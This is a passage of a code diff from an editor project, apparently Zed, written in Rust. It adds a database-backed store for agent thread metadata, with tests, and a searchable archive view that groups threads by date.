+ i = stmt.bind(&agent_id, i)?;
+ i = stmt.bind(&title, i)?;
+ i = stmt.bind(&updated_at, i)?;
+ i = stmt.bind(&created_at, i)?;
+ i = stmt.bind(&folder_paths, i)?;
+ stmt.bind(&folder_paths_order, i)?;
+ stmt.exec()
+ })
+ .await
+ }
+
+ /// Delete metadata for a single thread.
+ pub async fn delete(&self, session_id: acp::SessionId) -> anyhow::Result<()> {
+ let id = session_id.0.clone();
+ self.write(move |conn| {
+ let mut stmt =
+ Statement::prepare(conn, "DELETE FROM sidebar_threads WHERE session_id = ?")?;
+ stmt.bind(&id, 1)?;
+ stmt.exec()
+ })
+ .await
+ }
+}
+
+impl Column for ThreadMetadata {
+ fn column(statement: &mut Statement, start_index: i32) -> anyhow::Result<(Self, i32)> {
+ let (id, next): (Arc<str>, i32) = Column::column(statement, start_index)?;
+ let (agent_id, next): (Option<String>, i32) = Column::column(statement, next)?;
+ let (title, next): (String, i32) = Column::column(statement, next)?;
+ let (updated_at_str, next): (String, i32) = Column::column(statement, next)?;
+ let (created_at_str, next): (Option<String>, i32) = Column::column(statement, next)?;
+ let (folder_paths_str, next): (Option<String>, i32) = Column::column(statement, next)?;
+ let (folder_paths_order_str, next): (Option<String>, i32) =
+ Column::column(statement, next)?;
+
+ let updated_at = DateTime::parse_from_rfc3339(&updated_at_str)?.with_timezone(&Utc);
+ let created_at = created_at_str
+ .as_deref()
+ .map(DateTime::parse_from_rfc3339)
+ .transpose()?
+ .map(|dt| dt.with_timezone(&Utc));
+
+ let folder_paths = folder_paths_str
+ .map(|paths| {
+ PathList::deserialize(&util::path_list::SerializedPathList {
+ paths,
+ order: folder_paths_order_str.unwrap_or_default(),
+ })
+ })
+ .unwrap_or_default();
+
+ Ok((
+ ThreadMetadata {
+ session_id: acp::SessionId::new(id),
+ agent_id: agent_id.map(|id| AgentId::new(id)),
+ title: title.into(),
+ updated_at,
+ created_at,
+ folder_paths,
+ },
+ next,
+ ))
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use acp_thread::{AgentConnection, StubAgentConnection};
+ use action_log::ActionLog;
+ use agent::DbThread;
+ use agent_client_protocol as acp;
+ use feature_flags::FeatureFlagAppExt;
+ use gpui::TestAppContext;
+ use project::FakeFs;
+ use project::Project;
+ use std::path::Path;
+ use std::rc::Rc;
+
+ fn make_db_thread(title: &str, updated_at: DateTime<Utc>) -> DbThread {
+ DbThread {
+ title: title.to_string().into(),
+ messages: Vec::new(),
+ updated_at,
+ detailed_summary: None,
+ initial_project_snapshot: None,
+ cumulative_token_usage: Default::default(),
+ request_token_usage: Default::default(),
+ model: None,
+ profile: None,
+ imported: false,
+ subagent_context: None,
+ speed: None,
+ thinking_enabled: false,
+ thinking_effort: None,
+ draft_prompt: None,
+ ui_scroll_position: None,
+ }
+ }
+
+ fn make_metadata(
+ session_id: &str,
+ title: &str,
+ updated_at: DateTime<Utc>,
+ folder_paths: PathList,
+ ) -> ThreadMetadata {
+ ThreadMetadata {
+ session_id: acp::SessionId::new(session_id),
+ agent_id: None,
+ title: title.to_string().into(),
+ updated_at,
+ created_at: Some(updated_at),
+ folder_paths,
+ }
+ }
+
+ #[gpui::test]
+ async fn test_store_initializes_cache_from_database(cx: &mut TestAppContext) {
+ let first_paths = PathList::new(&[Path::new("/project-a")]);
+ let second_paths = PathList::new(&[Path::new("/project-b")]);
+ let now = Utc::now();
+ let older = now - chrono::Duration::seconds(1);
+
+ let thread = std::thread::current();
+ let test_name = thread.name().unwrap_or("unknown_test");
+ let db_name = format!("THREAD_METADATA_DB_{}", test_name);
+ let db = ThreadMetadataDb(smol::block_on(db::open_test_db::<ThreadMetadataDb>(
+ &db_name,
+ )));
+
+ db.save(make_metadata(
+ "session-1",
+ "First Thread",
+ now,
+ first_paths.clone(),
+ ))
+ .await
+ .unwrap();
+ db.save(make_metadata(
+ "session-2",
+ "Second Thread",
+ older,
+ second_paths.clone(),
+ ))
+ .await
+ .unwrap();
+
+ cx.update(|cx| {
+ let settings_store = settings::SettingsStore::test(cx);
+ cx.set_global(settings_store);
+ cx.update_flags(true, vec!["agent-v2".to_string()]);
+ SidebarThreadMetadataStore::init_global(cx);
+ });
+
+ cx.run_until_parked();
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ let store = store.read(cx);
+
+ let entry_ids = store
+ .entry_ids()
+ .map(|session_id| session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(entry_ids, vec!["session-1", "session-2"]);
+
+ let first_path_entries = store
+ .entries_for_path(&first_paths)
+ .map(|entry| entry.session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(first_path_entries, vec!["session-1"]);
+
+ let second_path_entries = store
+ .entries_for_path(&second_paths)
+ .map(|entry| entry.session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(second_path_entries, vec!["session-2"]);
+ });
+ }
+
+ #[gpui::test]
+ async fn test_store_cache_updates_after_save_and_delete(cx: &mut TestAppContext) {
+ cx.update(|cx| {
+ let settings_store = settings::SettingsStore::test(cx);
+ cx.set_global(settings_store);
+ cx.update_flags(true, vec!["agent-v2".to_string()]);
+ SidebarThreadMetadataStore::init_global(cx);
+ });
+
+ let first_paths = PathList::new(&[Path::new("/project-a")]);
+ let second_paths = PathList::new(&[Path::new("/project-b")]);
+ let initial_time = Utc::now();
+ let updated_time = initial_time + chrono::Duration::seconds(1);
+
+ let initial_metadata = make_metadata(
+ "session-1",
+ "First Thread",
+ initial_time,
+ first_paths.clone(),
+ );
+
+ let second_metadata = make_metadata(
+ "session-2",
+ "Second Thread",
+ initial_time,
+ second_paths.clone(),
+ );
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.update(cx, |store, cx| {
+ store.save(initial_metadata, cx).detach();
+ store.save(second_metadata, cx).detach();
+ });
+ });
+
+ cx.run_until_parked();
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ let store = store.read(cx);
+
+ let first_path_entries = store
+ .entries_for_path(&first_paths)
+ .map(|entry| entry.session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(first_path_entries, vec!["session-1"]);
+
+ let second_path_entries = store
+ .entries_for_path(&second_paths)
+ .map(|entry| entry.session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(second_path_entries, vec!["session-2"]);
+ });
+
+ let moved_metadata = make_metadata(
+ "session-1",
+ "First Thread",
+ updated_time,
+ second_paths.clone(),
+ );
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.update(cx, |store, cx| {
+ store.save(moved_metadata, cx).detach();
+ });
+ });
+
+ cx.run_until_parked();
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ let store = store.read(cx);
+
+ let entry_ids = store
+ .entry_ids()
+ .map(|session_id| session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(entry_ids, vec!["session-1", "session-2"]);
+
+ let first_path_entries = store
+ .entries_for_path(&first_paths)
+ .map(|entry| entry.session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert!(first_path_entries.is_empty());
+
+ let second_path_entries = store
+ .entries_for_path(&second_paths)
+ .map(|entry| entry.session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(second_path_entries, vec!["session-1", "session-2"]);
+ });
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.update(cx, |store, cx| {
+ store.delete(acp::SessionId::new("session-2"), cx).detach();
+ });
+ });
+
+ cx.run_until_parked();
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ let store = store.read(cx);
+
+ let entry_ids = store
+ .entry_ids()
+ .map(|session_id| session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(entry_ids, vec!["session-1"]);
+
+ let second_path_entries = store
+ .entries_for_path(&second_paths)
+ .map(|entry| entry.session_id.0.to_string())
+ .collect::<Vec<_>>();
+ assert_eq!(second_path_entries, vec!["session-1"]);
+ });
+ }
+
+ #[gpui::test]
+ async fn test_migrate_thread_metadata(cx: &mut TestAppContext) {
+ cx.update(|cx| {
+ ThreadStore::init_global(cx);
+ SidebarThreadMetadataStore::init_global(cx);
+ });
+
+ // Verify the cache is empty before migration
+ let list = cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.read(cx).entries().collect::<Vec<_>>()
+ });
+ assert_eq!(list.len(), 0);
+
+ let project_a_paths = PathList::new(&[Path::new("/project-a")]);
+ let project_b_paths = PathList::new(&[Path::new("/project-b")]);
+ let now = Utc::now();
+
+ for index in 0..12 {
+ let updated_at = now + chrono::Duration::seconds(index as i64);
+ let session_id = format!("project-a-session-{index}");
+ let title = format!("Project A Thread {index}");
+
+ let save_task = cx.update(|cx| {
+ let thread_store = ThreadStore::global(cx);
+ let session_id = session_id.clone();
+ let title = title.clone();
+ let project_a_paths = project_a_paths.clone();
+ thread_store.update(cx, |store, cx| {
+ store.save_thread(
+ acp::SessionId::new(session_id),
+ make_db_thread(&title, updated_at),
+ project_a_paths,
+ cx,
+ )
+ })
+ });
+ save_task.await.unwrap();
+ cx.run_until_parked();
+ }
+
+ for index in 0..3 {
+ let updated_at = now + chrono::Duration::seconds(100 + index as i64);
+ let session_id = format!("project-b-session-{index}");
+ let title = format!("Project B Thread {index}");
+
+ let save_task = cx.update(|cx| {
+ let thread_store = ThreadStore::global(cx);
+ let session_id = session_id.clone();
+ let title = title.clone();
+ let project_b_paths = project_b_paths.clone();
+ thread_store.update(cx, |store, cx| {
+ store.save_thread(
+ acp::SessionId::new(session_id),
+ make_db_thread(&title, updated_at),
+ project_b_paths,
+ cx,
+ )
+ })
+ });
+ save_task.await.unwrap();
+ cx.run_until_parked();
+ }
+
+ let save_projectless = cx.update(|cx| {
+ let thread_store = ThreadStore::global(cx);
+ thread_store.update(cx, |store, cx| {
+ store.save_thread(
+ acp::SessionId::new("projectless-session"),
+ make_db_thread("Projectless Thread", now + chrono::Duration::seconds(200)),
+ PathList::default(),
+ cx,
+ )
+ })
+ });
+ save_projectless.await.unwrap();
+ cx.run_until_parked();
+
+ // Run migration
+ cx.update(|cx| {
+ migrate_thread_metadata(cx);
+ });
+
+ cx.run_until_parked();
+
+ // Verify the metadata was migrated, limited to 10 per project, and
+ // projectless threads were skipped.
+ let list = cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.read(cx).entries().collect::<Vec<_>>()
+ });
+ assert_eq!(list.len(), 13);
+
+ assert!(
+ list.iter()
+ .all(|metadata| !metadata.folder_paths.is_empty())
+ );
+ assert!(
+ list.iter()
+ .all(|metadata| metadata.session_id.0.as_ref() != "projectless-session")
+ );
+
+ let project_a_entries = list
+ .iter()
+ .filter(|metadata| metadata.folder_paths == project_a_paths)
+ .collect::<Vec<_>>();
+ assert_eq!(project_a_entries.len(), 10);
+ assert_eq!(
+ project_a_entries
+ .iter()
+ .map(|metadata| metadata.session_id.0.as_ref())
+ .collect::<Vec<_>>(),
+ vec![
+ "project-a-session-11",
+ "project-a-session-10",
+ "project-a-session-9",
+ "project-a-session-8",
+ "project-a-session-7",
+ "project-a-session-6",
+ "project-a-session-5",
+ "project-a-session-4",
+ "project-a-session-3",
+ "project-a-session-2",
+ ]
+ );
+ assert!(
+ project_a_entries
+ .iter()
+ .all(|metadata| metadata.agent_id.is_none())
+ );
+
+ let project_b_entries = list
+ .iter()
+ .filter(|metadata| metadata.folder_paths == project_b_paths)
+ .collect::<Vec<_>>();
+ assert_eq!(project_b_entries.len(), 3);
+ assert_eq!(
+ project_b_entries
+ .iter()
+ .map(|metadata| metadata.session_id.0.as_ref())
+ .collect::<Vec<_>>(),
+ vec![
+ "project-b-session-2",
+ "project-b-session-1",
+ "project-b-session-0",
+ ]
+ );
+ assert!(
+ project_b_entries
+ .iter()
+ .all(|metadata| metadata.agent_id.is_none())
+ );
+ }
+
+ #[gpui::test]
+ async fn test_migrate_thread_metadata_skips_when_data_exists(cx: &mut TestAppContext) {
+ cx.update(|cx| {
+ ThreadStore::init_global(cx);
+ SidebarThreadMetadataStore::init_global(cx);
+ });
+
+ // Pre-populate the metadata store with existing data
+ let existing_metadata = ThreadMetadata {
+ session_id: acp::SessionId::new("existing-session"),
+ agent_id: None,
+ title: "Existing Thread".into(),
+ updated_at: Utc::now(),
+ created_at: Some(Utc::now()),
+ folder_paths: PathList::default(),
+ };
+
+ cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.update(cx, |store, cx| {
+ store.save(existing_metadata, cx).detach();
+ });
+ });
+
+ cx.run_until_parked();
+
+ // Add an entry to native thread store that should NOT be migrated
+ let save_task = cx.update(|cx| {
+ let thread_store = ThreadStore::global(cx);
+ thread_store.update(cx, |store, cx| {
+ store.save_thread(
+ acp::SessionId::new("native-session"),
+ make_db_thread("Native Thread", Utc::now()),
+ PathList::default(),
+ cx,
+ )
+ })
+ });
+ save_task.await.unwrap();
+ cx.run_until_parked();
+
+ // Run migration - should skip because metadata store is not empty
+ cx.update(|cx| {
+ migrate_thread_metadata(cx);
+ });
+
+ cx.run_until_parked();
+
+ // Verify only the existing metadata is present (migration was skipped)
+ let list = cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.read(cx).entries().collect::<Vec<_>>()
+ });
+ assert_eq!(list.len(), 1);
+ assert_eq!(list[0].session_id.0.as_ref(), "existing-session");
+ }
+
+ #[gpui::test]
+ async fn test_subagent_threads_excluded_from_sidebar_metadata(cx: &mut TestAppContext) {
+ cx.update(|cx| {
+ let settings_store = settings::SettingsStore::test(cx);
+ cx.set_global(settings_store);
+ cx.update_flags(true, vec!["agent-v2".to_string()]);
+ ThreadStore::init_global(cx);
+ SidebarThreadMetadataStore::init_global(cx);
+ });
+
+ let fs = FakeFs::new(cx.executor());
+ let project = Project::test(fs, None::<&Path>, cx).await;
+ let connection = Rc::new(StubAgentConnection::new());
+
+ // Create a regular (non-subagent) AcpThread.
+ let regular_thread = cx
+ .update(|cx| {
+ connection
+ .clone()
+ .new_session(project.clone(), PathList::default(), cx)
+ })
+ .await
+ .unwrap();
+
+ let regular_session_id = cx.read(|cx| regular_thread.read(cx).session_id().clone());
+
+ // Set a title on the regular thread to trigger a save via handle_thread_update.
+ cx.update(|cx| {
+ regular_thread.update(cx, |thread, cx| {
+ thread.set_title("Regular Thread".into(), cx).detach();
+ });
+ });
+ cx.run_until_parked();
+
+ // Create a subagent AcpThread
+ let subagent_session_id = acp::SessionId::new("subagent-session");
+ let subagent_thread = cx.update(|cx| {
+ let action_log = cx.new(|_| ActionLog::new(project.clone()));
+ cx.new(|cx| {
+ acp_thread::AcpThread::new(
+ Some(regular_session_id.clone()),
+ Some("Subagent Thread".into()),
+ None,
+ connection.clone(),
+ project.clone(),
+ action_log,
+ subagent_session_id.clone(),
+ watch::Receiver::constant(acp::PromptCapabilities::new()),
+ cx,
+ )
+ })
+ });
+
+ // Set a title on the subagent thread to trigger handle_thread_update.
+ cx.update(|cx| {
+ subagent_thread.update(cx, |thread, cx| {
+ thread
+ .set_title("Subagent Thread Title".into(), cx)
+ .detach();
+ });
+ });
+ cx.run_until_parked();
+
+ // List all metadata from the store cache.
+ let list = cx.update(|cx| {
+ let store = SidebarThreadMetadataStore::global(cx);
+ store.read(cx).entries().collect::<Vec<_>>()
+ });
+
+ // The subagent thread should NOT appear in the sidebar metadata.
+ // Only the regular thread should be listed.
+ assert_eq!(
+ list.len(),
+ 1,
+ "Expected only the regular thread in sidebar metadata, \
+ but found {} entries (subagent threads are leaking into the sidebar)",
+ list.len(),
+ );
+ assert_eq!(list[0].session_id, regular_session_id);
+ assert_eq!(list[0].title.as_ref(), "Regular Thread");
+ }
+}
@@ -0,0 +1,978 @@
+use std::sync::Arc;
+
+use crate::{
+ Agent, RemoveSelectedThread, agent_connection_store::AgentConnectionStore,
+ thread_history::ThreadHistory,
+};
+use acp_thread::AgentSessionInfo;
+use agent::ThreadStore;
+use agent_client_protocol as acp;
+use chrono::{DateTime, Datelike as _, Local, NaiveDate, TimeDelta, Utc};
+use editor::Editor;
+use fs::Fs;
+use gpui::{
+ AnyElement, App, Context, Entity, EventEmitter, FocusHandle, Focusable, ListState, Render,
+ SharedString, Subscription, Task, Window, list, prelude::*, px,
+};
+use itertools::Itertools as _;
+use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious};
+use project::{AgentId, AgentServerStore};
+use theme::ActiveTheme;
+use ui::{
+ ButtonLike, CommonAnimationExt, ContextMenu, ContextMenuEntry, Divider, HighlightedLabel,
+ KeyBinding, PopoverMenu, PopoverMenuHandle, TintColor, Tooltip, WithScrollbar, prelude::*,
+ utils::platform_title_bar_height,
+};
+use util::ResultExt as _;
+use zed_actions::agents_sidebar::FocusSidebarFilter;
+use zed_actions::editor::{MoveDown, MoveUp};
+
+#[derive(Clone)]
+enum ArchiveListItem {
+ BucketSeparator(TimeBucket),
+ Entry {
+ session: AgentSessionInfo,
+ highlight_positions: Vec<usize>,
+ },
+}
+
+#[derive(Clone, Copy, Debug, PartialEq, Eq)]
+enum TimeBucket {
+ Today,
+ Yesterday,
+ ThisWeek,
+ PastWeek,
+ Older,
+}
+
+impl TimeBucket {
+ fn from_dates(reference: NaiveDate, date: NaiveDate) -> Self {
+ if date == reference {
+ return TimeBucket::Today;
+ }
+ if date == reference - TimeDelta::days(1) {
+ return TimeBucket::Yesterday;
+ }
+ let week = date.iso_week();
+ if reference.iso_week() == week {
+ return TimeBucket::ThisWeek;
+ }
+ let last_week = (reference - TimeDelta::days(7)).iso_week();
+ if week == last_week {
+ return TimeBucket::PastWeek;
+ }
+ TimeBucket::Older
+ }
+
+ fn label(&self) -> &'static str {
+ match self {
+ TimeBucket::Today => "Today",
+ TimeBucket::Yesterday => "Yesterday",
+ TimeBucket::ThisWeek => "This Week",
+ TimeBucket::PastWeek => "Past Week",
+ TimeBucket::Older => "Older",
+ }
+ }
+}
+
+fn fuzzy_match_positions(query: &str, text: &str) -> Option<Vec<usize>> {
+ let query = query.to_lowercase();
+ let text_lower = text.to_lowercase();
+ let mut positions = Vec::new();
+ let mut query_chars = query.chars().peekable();
+ for (i, c) in text_lower.chars().enumerate() {
+ if query_chars.peek() == Some(&c) {
+ positions.push(i);
+ query_chars.next();
+ }
+ }
+ if query_chars.peek().is_none() {
+ Some(positions)
+ } else {
+ None
+ }
+}
+
+fn archive_empty_state_message(
+ has_history: bool,
+ is_empty: bool,
+ has_query: bool,
+) -> Option<&'static str> {
+ if !is_empty {
+ None
+ } else if !has_history {
+ Some("This agent does not support viewing archived threads.")
+ } else if has_query {
+ Some("No threads match your search.")
+ } else {
+ Some("No archived threads yet.")
+ }
+}
+
+pub enum ThreadsArchiveViewEvent {
+ Close,
+ Unarchive {
+ agent: Agent,
+ session_info: AgentSessionInfo,
+ },
+}
+
+impl EventEmitter<ThreadsArchiveViewEvent> for ThreadsArchiveView {}
+
+pub struct ThreadsArchiveView {
+ agent_connection_store: Entity<AgentConnectionStore>,
+ agent_server_store: Entity<AgentServerStore>,
+ thread_store: Entity<ThreadStore>,
+ fs: Arc<dyn Fs>,
+ history: Option<Entity<ThreadHistory>>,
+ _history_subscription: Subscription,
+ selected_agent: Agent,
+ focus_handle: FocusHandle,
+ list_state: ListState,
+ items: Vec<ArchiveListItem>,
+ selection: Option<usize>,
+ hovered_index: Option<usize>,
+ filter_editor: Entity<Editor>,
+ _subscriptions: Vec<gpui::Subscription>,
+ selected_agent_menu: PopoverMenuHandle<ContextMenu>,
+ _refresh_history_task: Task<()>,
+ is_loading: bool,
+}
+
+impl ThreadsArchiveView {
+ pub fn new(
+ agent_connection_store: Entity<AgentConnectionStore>,
+ agent_server_store: Entity<AgentServerStore>,
+ thread_store: Entity<ThreadStore>,
+ fs: Arc<dyn Fs>,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Self {
+ let focus_handle = cx.focus_handle();
+
+ let filter_editor = cx.new(|cx| {
+ let mut editor = Editor::single_line(window, cx);
+ editor.set_placeholder_text("Search archive…", window, cx);
+ editor
+ });
+
+ let filter_editor_subscription =
+ cx.subscribe(&filter_editor, |this: &mut Self, _, event, cx| {
+ if let editor::EditorEvent::BufferEdited = event {
+ this.update_items(cx);
+ }
+ });
+
+ let filter_focus_handle = filter_editor.read(cx).focus_handle(cx);
+ cx.on_focus_in(
+ &filter_focus_handle,
+ window,
+ |this: &mut Self, _window, cx| {
+ if this.selection.is_some() {
+ this.selection = None;
+ cx.notify();
+ }
+ },
+ )
+ .detach();
+
+ cx.on_focus_out(&focus_handle, window, |this: &mut Self, _, _window, cx| {
+ this.selection = None;
+ cx.notify();
+ })
+ .detach();
+
+ let mut this = Self {
+ agent_connection_store,
+ agent_server_store,
+ thread_store,
+ fs,
+ history: None,
+ _history_subscription: Subscription::new(|| {}),
+ selected_agent: Agent::NativeAgent,
+ focus_handle,
+ list_state: ListState::new(0, gpui::ListAlignment::Top, px(1000.)),
+ items: Vec::new(),
+ selection: None,
+ hovered_index: None,
+ filter_editor,
+ _subscriptions: vec![filter_editor_subscription],
+ selected_agent_menu: PopoverMenuHandle::default(),
+ _refresh_history_task: Task::ready(()),
+ is_loading: true,
+ };
+ this.set_selected_agent(Agent::NativeAgent, window, cx);
+ this
+ }
+
+ pub fn has_selection(&self) -> bool {
+ self.selection.is_some()
+ }
+
+ pub fn clear_selection(&mut self) {
+ self.selection = None;
+ }
+
+ pub fn focus_filter_editor(&self, window: &mut Window, cx: &mut App) {
+ let handle = self.filter_editor.read(cx).focus_handle(cx);
+ handle.focus(window, cx);
+ }
+
+ fn set_selected_agent(&mut self, agent: Agent, window: &mut Window, cx: &mut Context<Self>) {
+ self.selected_agent = agent.clone();
+ self.is_loading = true;
+ self.reset_history_subscription();
+ self.history = None;
+ self.items.clear();
+ self.selection = None;
+ self.list_state.reset(0);
+ self.reset_filter_editor_text(window, cx);
+
+ let server = agent.server(self.fs.clone(), self.thread_store.clone());
+ let connection = self
+ .agent_connection_store
+ .update(cx, |store, cx| store.request_connection(agent, server, cx));
+
+ let task = connection.read(cx).wait_for_connection();
+ self._refresh_history_task = cx.spawn(async move |this, cx| {
+ if let Some(state) = task.await.log_err() {
+ this.update(cx, |this, cx| this.set_history(state.history, cx))
+ .ok();
+ }
+ });
+
+ cx.notify();
+ }
+
+ fn reset_history_subscription(&mut self) {
+ self._history_subscription = Subscription::new(|| {});
+ }
+
+ fn set_history(&mut self, history: Option<Entity<ThreadHistory>>, cx: &mut Context<Self>) {
+ self.reset_history_subscription();
+
+ if let Some(history) = &history {
+ self._history_subscription = cx.observe(history, |this, _, cx| {
+ this.update_items(cx);
+ });
+ history.update(cx, |history, cx| {
+ history.refresh_full_history(cx);
+ });
+ }
+ self.history = history;
+ self.is_loading = false;
+ self.update_items(cx);
+ cx.notify();
+ }
+
+ fn update_items(&mut self, cx: &mut Context<Self>) {
+ let sessions = self
+ .history
+ .as_ref()
+ .map(|h| h.read(cx).sessions().to_vec())
+ .unwrap_or_default();
+ let query = self.filter_editor.read(cx).text(cx).to_lowercase();
+ let today = Local::now().naive_local().date();
+
+ let mut items = Vec::with_capacity(sessions.len() + 5);
+ let mut current_bucket: Option<TimeBucket> = None;
+
+ for session in sessions {
+ let highlight_positions = if !query.is_empty() {
+ let title = session.title.as_ref().map(|t| t.as_ref()).unwrap_or("");
+ match fuzzy_match_positions(&query, title) {
+ Some(positions) => positions,
+ None => continue,
+ }
+ } else {
+ Vec::new()
+ };
+
+ let entry_bucket = session
+ .updated_at
+ .map(|timestamp| {
+ let entry_date = timestamp.with_timezone(&Local).naive_local().date();
+ TimeBucket::from_dates(today, entry_date)
+ })
+ .unwrap_or(TimeBucket::Older);
+
+ if Some(entry_bucket) != current_bucket {
+ current_bucket = Some(entry_bucket);
+ items.push(ArchiveListItem::BucketSeparator(entry_bucket));
+ }
+
+ items.push(ArchiveListItem::Entry {
+ session,
+ highlight_positions,
+ });
+ }
+
+ self.list_state.reset(items.len());
+ self.items = items;
+ self.selection = None;
+ self.hovered_index = None;
+ cx.notify();
+ }
+
+ fn reset_filter_editor_text(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ self.filter_editor.update(cx, |editor, cx| {
+ editor.set_text("", window, cx);
+ });
+ }
+
+ fn unarchive_thread(
+ &mut self,
+ session_info: AgentSessionInfo,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.selection = None;
+ self.reset_filter_editor_text(window, cx);
+ cx.emit(ThreadsArchiveViewEvent::Unarchive {
+ agent: self.selected_agent.clone(),
+ session_info,
+ });
+ }
+
+ fn delete_thread(&mut self, session_id: &acp::SessionId, cx: &mut Context<Self>) {
+ let Some(history) = &self.history else {
+ return;
+ };
+ if !history.read(cx).supports_delete() {
+ return;
+ }
+ let session_id = session_id.clone();
+ history.update(cx, |history, cx| {
+ history
+ .delete_session(&session_id, cx)
+ .detach_and_log_err(cx);
+ });
+ }
+
+ fn remove_selected_thread(
+ &mut self,
+ _: &RemoveSelectedThread,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let Some(ix) = self.selection else {
+ return;
+ };
+ let Some(ArchiveListItem::Entry { session, .. }) = self.items.get(ix) else {
+ return;
+ };
+ let session_id = session.session_id.clone();
+ self.delete_thread(&session_id, cx);
+ }
+
+ fn is_selectable_item(&self, ix: usize) -> bool {
+ matches!(self.items.get(ix), Some(ArchiveListItem::Entry { .. }))
+ }
+
+ fn find_next_selectable(&self, start: usize) -> Option<usize> {
+ (start..self.items.len()).find(|&i| self.is_selectable_item(i))
+ }
+
+ fn find_previous_selectable(&self, start: usize) -> Option<usize> {
+ (0..=start).rev().find(|&i| self.is_selectable_item(i))
+ }
+
+ fn editor_move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context<Self>) {
+ self.select_next(&SelectNext, window, cx);
+ if self.selection.is_some() {
+ self.focus_handle.focus(window, cx);
+ }
+ }
+
+ fn editor_move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context<Self>) {
+ self.select_previous(&SelectPrevious, window, cx);
+ if self.selection.is_some() {
+ self.focus_handle.focus(window, cx);
+ }
+ }
+
+ fn select_next(&mut self, _: &SelectNext, _window: &mut Window, cx: &mut Context<Self>) {
+ let next = match self.selection {
+ Some(ix) => self.find_next_selectable(ix + 1),
+ None => self.find_next_selectable(0),
+ };
+ if let Some(next) = next {
+ self.selection = Some(next);
+ self.list_state.scroll_to_reveal_item(next);
+ cx.notify();
+ }
+ }
+
+ fn select_previous(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context<Self>) {
+ match self.selection {
+ Some(ix) => {
+ if let Some(prev) = (ix > 0)
+ .then(|| self.find_previous_selectable(ix - 1))
+ .flatten()
+ {
+ self.selection = Some(prev);
+ self.list_state.scroll_to_reveal_item(prev);
+ } else {
+ self.selection = None;
+ self.focus_filter_editor(window, cx);
+ }
+ cx.notify();
+ }
+ None => {
+ let last = self.items.len().saturating_sub(1);
+ if let Some(prev) = self.find_previous_selectable(last) {
+ self.selection = Some(prev);
+ self.list_state.scroll_to_reveal_item(prev);
+ cx.notify();
+ }
+ }
+ }
+ }
+
+ fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context<Self>) {
+ if let Some(first) = self.find_next_selectable(0) {
+ self.selection = Some(first);
+ self.list_state.scroll_to_reveal_item(first);
+ cx.notify();
+ }
+ }
+
+ fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context<Self>) {
+ let last = self.items.len().saturating_sub(1);
+ if let Some(last) = self.find_previous_selectable(last) {
+ self.selection = Some(last);
+ self.list_state.scroll_to_reveal_item(last);
+ cx.notify();
+ }
+ }
+
+ fn confirm(&mut self, _: &Confirm, window: &mut Window, cx: &mut Context<Self>) {
+ let Some(ix) = self.selection else { return };
+ let Some(ArchiveListItem::Entry { session, .. }) = self.items.get(ix) else {
+ return;
+ };
+
+ let can_unarchive = session.work_dirs.as_ref().is_some_and(|p| !p.is_empty());
+ if !can_unarchive {
+ return;
+ }
+
+ self.unarchive_thread(session.clone(), window, cx);
+ }
+
+ fn render_list_entry(
+ &mut self,
+ ix: usize,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> AnyElement {
+ let Some(item) = self.items.get(ix) else {
+ return div().into_any_element();
+ };
+
+ match item {
+ ArchiveListItem::BucketSeparator(bucket) => div()
+ .w_full()
+ .px_2p5()
+ .pt_3()
+ .pb_1()
+ .child(
+ Label::new(bucket.label())
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element(),
+ ArchiveListItem::Entry {
+ session,
+ highlight_positions,
+ } => {
+ let id = SharedString::from(format!("archive-entry-{}", ix));
+
+ let is_focused = self.selection == Some(ix);
+ let hovered = self.hovered_index == Some(ix);
+
+ let project_names = session.work_dirs.as_ref().and_then(|paths| {
+ let paths_str = paths
+ .paths()
+ .iter()
+ .filter_map(|p| p.file_name())
+ .filter_map(|name| name.to_str())
+ .join(", ");
+ if paths_str.is_empty() {
+ None
+ } else {
+ Some(paths_str)
+ }
+ });
+
+ let can_unarchive = session.work_dirs.as_ref().is_some_and(|p| !p.is_empty());
+
+ let supports_delete = self
+ .history
+ .as_ref()
+ .map(|h| h.read(cx).supports_delete())
+ .unwrap_or(false);
+
+ let title: SharedString =
+ session.title.clone().unwrap_or_else(|| "Untitled".into());
+
+ let session_info = session.clone();
+ let session_id_for_delete = session.session_id.clone();
+ let focus_handle = self.focus_handle.clone();
+
+ let timestamp = session
+ .created_at
+ .or(session.updated_at)
+ .map(format_history_entry_timestamp);
+
